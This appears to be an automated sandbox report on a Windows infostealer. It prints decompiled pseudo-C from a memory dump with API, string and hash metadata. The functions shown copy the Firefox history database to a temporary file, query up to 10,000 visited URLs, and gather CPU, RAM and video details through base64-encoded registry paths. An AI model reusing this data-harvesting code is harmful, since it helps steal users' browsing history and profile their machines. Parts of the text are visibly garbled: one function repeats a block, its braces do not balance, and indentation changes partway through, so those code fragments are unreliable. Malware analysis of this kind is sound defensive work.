                                                                                                                                                                                              				void* _t220;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t215 = __esi;
                                                                                                                                                                                              				_t177 = __ebx;
                                                                                                                                                                                              				_t217 = _t218;
                                                                                                                                                                                              				_t178 = 0xb;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t178 = _t178 - 1;
                                                                                                                                                                                              					_t223 = _t178;
                                                                                                                                                                                              				} while (_t178 != 0);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				_push(_t217);
                                                                                                                                                                                              				_push(0x412839);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t218;
                                                                                                                                                                                              				E00403B80( &_v28);
                                                                                                                                                                                              				_push(_t217);
                                                                                                                                                                                              				_push(0x4127af);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t218;
                                                                                                                                                                                              				E00406FDC(GetTickCount(), __ebx,  &_v60, __esi, _t223);
                                                                                                                                                                                              				_push(_v60);
                                                                                                                                                                                              				E00406F1C( &_v64, __ebx, __edi, __esi, _t223);
                                                                                                                                                                                              				_push(_v64);
                                                                                                                                                                                              				_push(L".tmp");
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v8, _t177,  &_v40, _t223);
                                                                                                                                                                                              				E004062D8(L"%TEMP%",  &_v72, _t223);
                                                                                                                                                                                              				_push(_v72);
                                                                                                                                                                                              				_push(0x412870);
                                                                                                                                                                                              				_push(_v32);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040781C(_v68, _t177,  &_v44, _t223);
                                                                                                                                                                                              				_t86 = E00403D3C(_v44);
                                                                                                                                                                                              				CopyFileW(E00403D3C(_v40), _t86, 0xffffffff);
                                                                                                                                                                                              				E0040377C( &_v76, _v44);
                                                                                                                                                                                              				E00404AFC(_v76, _t177, _t178,  &_v36, _t215, _t223);
                                                                                                                                                                                              				E00403D2C( &_v80, _v36);
                                                                                                                                                                                              				if(E004076B0(_v80, _t177, _t178) != 0) {
                                                                                                                                                                                              					_t101 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                              					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
                                                                                                                                                                                              					_t219 = _t218 + 8;
                                                                                                                                                                                              					__eflags = _t103;
                                                                                                                                                                                              					if(_t103 == 0) {
                                                                                                                                                                                              						_t138 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                              						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME(moz_historyvisits.visit_date/1000000, \"unixepoch\", \"localtime\"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                              						_t220 = _t219 + 0x14;
                                                                                                                                                                                              						__eflags = _t140;
                                                                                                                                                                                              						if(_t140 == 0) {
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								_t142 =  *0x41b600; // 0x41c790
                                                                                                                                                                                              								_t144 =  *((intOrPtr*)( *_t142))(_v20);
                                                                                                                                                                                              								__eflags = _t144 - 0x64;
                                                                                                                                                                                              								if(_t144 != 0x64) {
                                                                                                                                                                                              									goto L9;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								E004034E4( &_v48);
                                                                                                                                                                                              								E004034E4( &_v52);
                                                                                                                                                                                              								E004034E4( &_v56);
                                                                                                                                                                                              								_t152 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
                                                                                                                                                                                              								_t158 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
                                                                                                                                                                                              								_t164 =  *0x41b588; // 0x41c794
                                                                                                                                                                                              								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
                                                                                                                                                                                              								_t220 = _t220 + 0x18;
                                                                                                                                                                                              								E004036DC( &_v56, _t166);
                                                                                                                                                                                              								_push(_v28);
                                                                                                                                                                                              								_push(0x412978);
                                                                                                                                                                                              								E00403D2C( &_v84, _v48);
                                                                                                                                                                                              								_push(_v84);
                                                                                                                                                                                              								_push(0x412980);
                                                                                                                                                                                              								E00403D2C( &_v88, _v52);
                                                                                                                                                                                              								_push(_v88);
                                                                                                                                                                                              								_push(0x41298c);
                                                                                                                                                                                              								E00403D2C( &_v92, _v56);
                                                                                                                                                                                              								_push(_v92);
                                                                                                                                                                                              								_push(L"\r\n\r\n");
                                                                                                                                                                                              								E00403E1C();
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L9:
                                                                                                                                                                                              					_t105 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                              					 *((intOrPtr*)( *_t105))(_v20);
                                                                                                                                                                                              					_t109 =  *0x41b590; // 0x41c788
                                                                                                                                                                                              					 *((intOrPtr*)( *_t109))(_v16);
                                                                                                                                                                                              					_pop(_t198);
                                                                                                                                                                                              					 *[fs:eax] = _t198;
                                                                                                                                                                                              					E00403BBC(_v12, _v28);
                                                                                                                                                                                              					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_pop(_t213);
                                                                                                                                                                                              					 *[fs:eax] = _t213;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t200);
                                                                                                                                                                                              				 *[fs:eax] = _t200;
                                                                                                                                                                                              				_push(E00412840);
                                                                                                                                                                                              				E00403B98( &_v92, 4);
                                                                                                                                                                                              				E004034E4( &_v76);
                                                                                                                                                                                              				E00403B98( &_v72, 4);
                                                                                                                                                                                              				E00403508( &_v56, 3);
                                                                                                                                                                                              				E00403B98( &_v44, 2);
                                                                                                                                                                                              				E004034E4( &_v36);
                                                                                                                                                                                              				E00403B98( &_v32, 2);
                                                                                                                                                                                              				return E00403B80( &_v8);
                                                                                                                                                                                              			}

APIs
• GetTickCount.KERNEL32 ref: 004125B0
• CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412870,?,.tmp,?,?,00000000,004127AF,?,00000000,00412839,?,00000000), ref: 0041262C
• DeleteFileW.KERNEL32(00000000), ref: 004127CD
Strings
• SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412696
• %TEMP%, xrefs: 004125EB
• .tmp, xrefs: 004125CB
• , xrefs: 00412760
Memory Dump Source
• Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: File$CopyCountDeleteTick
• String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
• API String ID: 2381671008-462058183
• Opcode ID: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
• Instruction ID: 880bf71673710542150f6ebe4433b3a02274b147136189202950d85bd83b2515
• Opcode Fuzzy Hash: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
• Instruction Fuzzy Hash: A9810C71A00109AFDB00EF95DD82ADEBBB9EF48314F504536F410F72A2DB78AE558B58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 46%
E00416744(signed int __eax, void* __ebx, void* __esi) {
	struct _SYSTEM_INFO _v40;
	intOrPtr _v44;
	char _v48;
	char _v52;
	char _v56;
	char _v60;
	char _v64;
	char _v68;
	intOrPtr _v72;
	char _v76;
	char _v80;
	char _v84;
	char _v88;
	char _v92;
	signed int _t38;
	signed int _t91;
	void* _t92;
	void* _t93;
	intOrPtr _t112;
	void* _t116;
	intOrPtr _t119;
	intOrPtr _t120;

	_t117 = __esi;
	_t38 = __eax | 0x5500000a;
	_t119 = _t120;
	_t92 = 0xb;
	do {
		_push(0);
		_push(0);
		_t92 = _t92 - 1;
		_t122 = _t92;
	} while (_t92 != 0);
	_t91 = _t38;
	_push(_t119);
	_push(0x4168d4);
	_push( *[fs:eax]);
	 *[fs:eax] = _t120;
	GetSystemInfo( &_v40);
	E00403D2C( &_v48,  *_t91);
	_push(_v48);
	_push(L"CPU Model: ");
	_push(0);
	_push( &_v52);
	E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t91,  &_v60, _t116, __esi);
	E00403D2C( &_v56, _v60);
	_push(_v56);
	E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t91,  &_v68, _t116, __esi);
	E00403D2C( &_v64, _v68);
	_pop(_t93);
	E00407500(0x80000002, _t91, _t93, _v64);
	_push(_v52);
	_push(0x416974);
	E00403E1C();
	E0040377C(_t91, _v44);
	E004037DC( &_v80, "CPU Count: ",  *_t91);
	E00403D2C( &_v76, _v80);
	_push(_v76);
	E00406FDC(_v40.dwNumberOfProcessors, _t91,  &_v84, _t117, _t122);
	_push(_v84);
	_push(0x416974);
	E00403E1C();
	E0040377C(_t91, _v72);
	_push( *_t91);
	_push("GetRAM: ");
	E00416584( &_v88, _t91, _t117, _t122);
	_push(_v88);
	_push(0x4169ac);
	E00403850();
	_push( *_t91);
	_push("Video Info\r\n");
	E00416644( &_v92, _t91, _t116, _t117);
	_push(_v92);
	E00403850();
	_t112 = 0x4169ac;
	 *[fs:eax] = _t112;
	_push(E004168DB);
	E00403508( &_v92, 2);
	E00403B80( &_v84);
	E004034E4( &_v80);
	E00403B98( &_v76, 2);
	E004034E4( &_v68);
	E00403B80( &_v64);
	E004034E4( &_v60);
	return E00403B98( &_v56, 4);
}

























                                                                                                                                                                                              0x00416872
                                                                                                                                                                                              0x00416879
                                                                                                                                                                                              0x0041687c
                                                                                                                                                                                              0x0041687f
                                                                                                                                                                                              0x0041688c
                                                                                                                                                                                              0x00416894
                                                                                                                                                                                              0x0041689c
                                                                                                                                                                                              0x004168a9
                                                                                                                                                                                              0x004168b1
                                                                                                                                                                                              0x004168b9
                                                                                                                                                                                              0x004168c1
                                                                                                                                                                                              0x004168d3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeString$InfoSystem
                                                                                                                                                                                              • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                                                                                                              • API String ID: 4070941872-1038824218
                                                                                                                                                                                              • Opcode ID: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                                                                                                                                                                                              • Instruction ID: 93658ecaa3e0ddcdd5b33a88495a7f5ee5c1cb8a97fdfd99440d65a07410f67b
                                                                                                                                                                                              • Opcode Fuzzy Hash: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF411F70A1010DABDB01FFD1D882ACDBBB9EF48309F61403BF504B7296D639EA458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E00416748(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                              				struct _SYSTEM_INFO _v40;
                                                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				intOrPtr _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				intOrPtr* _t90;
                                                                                                                                                                                              				void* _t91;
                                                                                                                                                                                              				void* _t92;
                                                                                                                                                                                              				intOrPtr _t111;
                                                                                                                                                                                              				intOrPtr _t118;
                                                                                                                                                                                              				intOrPtr _t119;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t116 = __esi;
                                                                                                                                                                                              				_t115 = __edi;
                                                                                                                                                                                              				_t118 = _t119;
                                                                                                                                                                                              				_t91 = 0xb;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t91 = _t91 - 1;
                                                                                                                                                                                              					_t120 = _t91;
                                                                                                                                                                                              				} while (_t91 != 0);
                                                                                                                                                                                              				_t90 = __eax;
                                                                                                                                                                                              				_push(_t118);
                                                                                                                                                                                              				_push(0x4168d4);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t119;
                                                                                                                                                                                              				GetSystemInfo( &_v40);
                                                                                                                                                                                              				E00403D2C( &_v48,  *_t90);
                                                                                                                                                                                              				_push(_v48);
                                                                                                                                                                                              				_push(L"CPU Model: ");
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push( &_v52);
                                                                                                                                                                                              				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t90,  &_v60, __edi, __esi);
                                                                                                                                                                                              				E00403D2C( &_v56, _v60);
                                                                                                                                                                                              				_push(_v56);
                                                                                                                                                                                              				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t90,  &_v68, __edi, __esi);
                                                                                                                                                                                              				E00403D2C( &_v64, _v68);
                                                                                                                                                                                              				_pop(_t92);
                                                                                                                                                                                              				E00407500(0x80000002, _t90, _t92, _v64);
                                                                                                                                                                                              				_push(_v52);
                                                                                                                                                                                              				_push(0x416974);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t90, _v44);
                                                                                                                                                                                              				E004037DC( &_v80, "CPU Count: ",  *_t90);
                                                                                                                                                                                              				E00403D2C( &_v76, _v80);
                                                                                                                                                                                              				_push(_v76);
                                                                                                                                                                                              				E00406FDC(_v40.dwNumberOfProcessors, _t90,  &_v84, _t116, _t120);
                                                                                                                                                                                              				_push(_v84);
                                                                                                                                                                                              				_push(0x416974);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E0040377C(_t90, _v72);
                                                                                                                                                                                              				_push( *_t90);
                                                                                                                                                                                              				_push("GetRAM: ");
                                                                                                                                                                                              				E00416584( &_v88, _t90, _t116, _t120);
                                                                                                                                                                                              				_push(_v88);
                                                                                                                                                                                              				_push(0x4169ac);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_push( *_t90);
                                                                                                                                                                                              				_push("Video Info\r\n");
                                                                                                                                                                                              				E00416644( &_v92, _t90, _t115, _t116);
                                                                                                                                                                                              				_push(_v92);
                                                                                                                                                                                              				E00403850();
                                                                                                                                                                                              				_t111 = 0x4169ac;
                                                                                                                                                                                              				 *[fs:eax] = _t111;
                                                                                                                                                                                              				_push(E004168DB);
                                                                                                                                                                                              				E00403508( &_v92, 2);
                                                                                                                                                                                              				E00403B80( &_v84);
                                                                                                                                                                                              				E004034E4( &_v80);
                                                                                                                                                                                              				E00403B98( &_v76, 2);
                                                                                                                                                                                              				E004034E4( &_v68);
                                                                                                                                                                                              				E00403B80( &_v64);
                                                                                                                                                                                              				E004034E4( &_v60);
                                                                                                                                                                                              				return E00403B98( &_v56, 4);
                                                                                                                                                                                              			}























                                                                                                                                                                                              0x00416804
                                                                                                                                                                                              0x0041680d
                                                                                                                                                                                              0x00416812
                                                                                                                                                                                              0x00416815
                                                                                                                                                                                              0x00416822
                                                                                                                                                                                              0x0041682c
                                                                                                                                                                                              0x00416831
                                                                                                                                                                                              0x00416833
                                                                                                                                                                                              0x0041683b
                                                                                                                                                                                              0x00416840
                                                                                                                                                                                              0x00416843
                                                                                                                                                                                              0x0041684f
                                                                                                                                                                                              0x00416854
                                                                                                                                                                                              0x00416856
                                                                                                                                                                                              0x0041685e
                                                                                                                                                                                              0x00416863
                                                                                                                                                                                              0x00416872
                                                                                                                                                                                              0x00416879
                                                                                                                                                                                              0x0041687c
                                                                                                                                                                                              0x0041687f
                                                                                                                                                                                              0x0041688c
                                                                                                                                                                                              0x00416894
                                                                                                                                                                                              0x0041689c
                                                                                                                                                                                              0x004168a9
                                                                                                                                                                                              0x004168b1
                                                                                                                                                                                              0x004168b9
                                                                                                                                                                                              0x004168c1
                                                                                                                                                                                              0x004168d3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeString$InfoSystem
                                                                                                                                                                                              • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                                                                                                              • API String ID: 4070941872-1038824218
                                                                                                                                                                                              • Opcode ID: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                                                                                                                                                                                              • Instruction ID: 0500c902736339f4efa0b07d3f9bc907855da1606bbc95f65d7857d0c3659172
                                                                                                                                                                                              • Opcode Fuzzy Hash: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 27410F70A1010DABDB01FFD1D882EDDBBB9EF48709F61403BF504B7296D639EA458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E00403368(void* __ecx) {
                                                                                                                                                                                              				long _v4;
                                                                                                                                                                                              				int _t3;
                                                                                                                                                                                              
                                                                                                                                                                                              				if( *0x41c034 == 0) {
                                                                                                                                                                                              					if( *0x41b024 == 0) {
                                                                                                                                                                                              						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _t3;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					if( *0x41c208 == 0xd7b2 &&  *0x41c210 > 0) {
                                                                                                                                                                                              						 *0x41c220();
                                                                                                                                                                                              					}
                                                                                                                                                                                              					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                                                                                                                                              					return WriteFile(GetStdHandle(0xfffffff5), E004033F0, 2,  &_v4, 0);
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}






                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033BC
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033C2
                                                                                                                                                                                              • MessageBoxA.USER32 ref: 004033E0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileHandleWrite$Message
                                                                                                                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                              • API String ID: 1570097196-2970929446
                                                                                                                                                                                              • Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                                                                                                                                              • Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                                                                                                                                              • Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00402668(CHAR* __eax, intOrPtr* __edx) {
                                                                                                                                                                                              				char _t5;
                                                                                                                                                                                              				char _t6;
                                                                                                                                                                                              				CHAR* _t7;
                                                                                                                                                                                              				char _t9;
                                                                                                                                                                                              				CHAR* _t11;
                                                                                                                                                                                              				char _t14;
                                                                                                                                                                                              				CHAR* _t15;
                                                                                                                                                                                              				char _t17;
                                                                                                                                                                                              				CHAR* _t19;
                                                                                                                                                                                              				CHAR* _t22;
                                                                                                                                                                                              				CHAR* _t23;
                                                                                                                                                                                              				CHAR* _t32;
                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                              				intOrPtr* _t34;
                                                                                                                                                                                              				void* _t35;
                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t34 = __edx;
                                                                                                                                                                                              				_t22 = __eax;
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					L2:
                                                                                                                                                                                              					_t5 =  *_t22;
                                                                                                                                                                                              					if(_t5 != 0 && _t5 <= 0x20) {
                                                                                                                                                                                              						_t22 = CharNextA(_t22);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L2:
                                                                                                                                                                                              					_t5 =  *_t22;
                                                                                                                                                                                              					if(_t5 != 0 && _t5 <= 0x20) {
                                                                                                                                                                                              						_t22 = CharNextA(_t22);
		}
		L4:
		if( *_t22 != 0x22 || _t22[1] != 0x22) {
			_t36 = 0;
			_t32 = _t22;
			while(1) {
				_t6 =  *_t22;
				if(_t6 <= 0x20) {
					break;
				}
				if(_t6 != 0x22) {
					_t7 = CharNextA(_t22);
					_t36 = _t36 + _t7 - _t22;
					_t22 = _t7;
					continue;
				}
				_t22 = CharNextA(_t22);
				while(1) {
					_t9 =  *_t22;
					if(_t9 == 0 || _t9 == 0x22) {
						break;
					}
					_t11 = CharNextA(_t22);
					_t36 = _t36 + _t11 - _t22;
					_t22 = _t11;
				}
				if( *_t22 != 0) {
					_t22 = CharNextA(_t22);
				}
			}
			E00403AC0(_t34, _t36);
			_t23 = _t32;
			_t33 =  *_t34;
			_t35 = 0;
			while(1) {
				_t14 =  *_t23;
				if(_t14 <= 0x20) {
					break;
				}
				if(_t14 != 0x22) {
					_t15 = CharNextA(_t23);
					if(_t15 <= _t23) {
						continue;
					} else {
						goto L27;
					}
					do {
						L27:
						 *((char*)(_t33 + _t35)) =  *_t23;
						_t23 =  &(_t23[1]);
						_t35 = _t35 + 1;
					} while (_t15 > _t23);
					continue;
				}
				_t23 = CharNextA(_t23);
				while(1) {
					_t17 =  *_t23;
					if(_t17 == 0 || _t17 == 0x22) {
						break;
					}
					_t19 = CharNextA(_t23);
					if(_t19 <= _t23) {
						continue;
					} else {
						goto L21;
					}
					do {
						L21:
						 *((char*)(_t33 + _t35)) =  *_t23;
						_t23 =  &(_t23[1]);
						_t35 = _t35 + 1;
					} while (_t19 > _t23);
				}
				if( *_t23 != 0) {
					_t23 = CharNextA(_t23);
				}
			}
			return _t23;
		} else {
			_t22 =  &(_t22[2]);
			continue;
		}
	}
}



















                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040268f
                                                                                                                                                                                              0x00402687

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 0040269F
                                                                                                                                                                                              • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026A9
                                                                                                                                                                                              • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026C6
                                                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026D0
                                                                                                                                                                                              • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026F9
                                                                                                                                                                                              • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402703
                                                                                                                                                                                              • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402727
                                                                                                                                                                                              • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402731
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CharNext
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3213498283-0
                                                                                                                                                                                              • Opcode ID: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                                                                                                                                                                                              • Instruction ID: 5b28f76bfa796ab2381ca360e83c3cb8d2614de50686c14b6561fe7fc9f0b368
                                                                                                                                                                                              • Opcode Fuzzy Hash: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                                                                                                                                                                                              • Instruction Fuzzy Hash: B021E7546043951ADB31297A0AC877B6B894A5B304B68087BD0C1BB3D7D4FE4C8B832D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                                                              			E00410E70(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				WCHAR* _t87;
                                                                                                                                                                                              				intOrPtr* _t102;
                                                                                                                                                                                              				intOrPtr _t104;
                                                                                                                                                                                              				intOrPtr* _t106;
                                                                                                                                                                                              				intOrPtr* _t110;
                                                                                                                                                                                              				intOrPtr* _t147;
                                                                                                                                                                                              				intOrPtr _t149;
                                                                                                                                                                                              				intOrPtr* _t151;
                                                                                                                                                                                              				void* _t153;
                                                                                                                                                                                              				intOrPtr* _t155;
                                                                                                                                                                                              				intOrPtr* _t159;
